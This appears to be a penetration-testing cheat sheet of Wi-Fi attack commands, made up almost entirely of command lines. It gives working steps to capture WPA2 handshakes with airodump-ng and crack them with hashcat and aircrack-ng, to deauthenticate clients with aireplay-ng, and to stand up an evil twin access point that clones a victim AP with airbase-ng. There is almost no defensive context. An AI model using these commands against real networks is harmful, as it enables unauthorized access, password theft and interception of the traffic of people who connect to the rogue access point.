WPA2 + hashcat

Write WPA2 handshake to pcap file

# airodump-ng -w /root/Desktop/wpa2handshake.cap -c 11 --bssid (bssid) wlan0mon

Use aircrack-ng to parse *.pcap file to hashcat hccap format

# aircrack-ng /root/Desktop/wpa2handshake.cap -J wpa2handshake_hashcat.hccap

You’re then prompted to choose network/SSID to parse.

Crack with hashcat. 10 chars bruteforce

# hashcat64.bin -a 3 -m 2500 -w 3 wpa2handshake_hashcat.hccap ?d?d?d?d?d?d?d?d?d?d -o WPAoutput.pot

Airbase-ng – Evil Twin

Check wifi interface

  • iwconfig

Turn up the power

  • iwconfig wlan0 txpower 27

Start wifi interface

  • airmon-ng start wlan0

Capture data & choose target AP

  • airodump-ng wlan0mon

Create Fake AP

  • airbase-ng wlan0mon -c 11 -a 20:34:67:24:89:76  -e FakeAP -v -z 2

Create Evil Twin AP

  • airbase-ng -a [victim AP MAC] -c 11-Z 4 --essid VictimAP wlan0mon

Monitor Evil Twin AP

  • airodump-ng --bssid [victim AP MAC] wlan0mon --channel 11 -w /root/Desktop/rougueap


  • aireplay-ng -0 2 -a [router bssid] -c [Client MAC address] wlan0mon


  • aircrack-ng -b [victim AP MAC] -w /usr/share/wordlists/rockyou.txt rougue-01.cap

WPA2 + Aircrack-ng

  1. Show wifi interfaces
    1. airmon-ng
    2. airmon-ng check kill ( If wifi interface doesn’t show up correctly)
  2. Start wifi interface
    1. airmon-ng start wlan0
  3. Scan for wifi networks
    1. airodump-ng wlan0mon
  4. Choose wifi to test
    1. ctrl+c to stop scanning
    2. # airodump-ng -c 11 --bssid [router bssid] -w /root/Desktop/wpa2handshake.cap mon0
    3. # airodump-ng --ignore-negative-one --bssid [router bssid] -c 11 -w /root/Desktop/wpa2handshake.cap mon0 (Alternative method)
  5. DeAuth clients on victim AP
    1. # aireplay-ng -0 2 -a [router bssid] -c 40:A6:D9:1F:4A:D3(Client MAC address) mon0
    2. Wait for handshake to be captured
  6. Crack handshake
    1. # aircrack-ng -a2 -b [router bssid] -w [path to wordlist] /root/Desktop/*.cap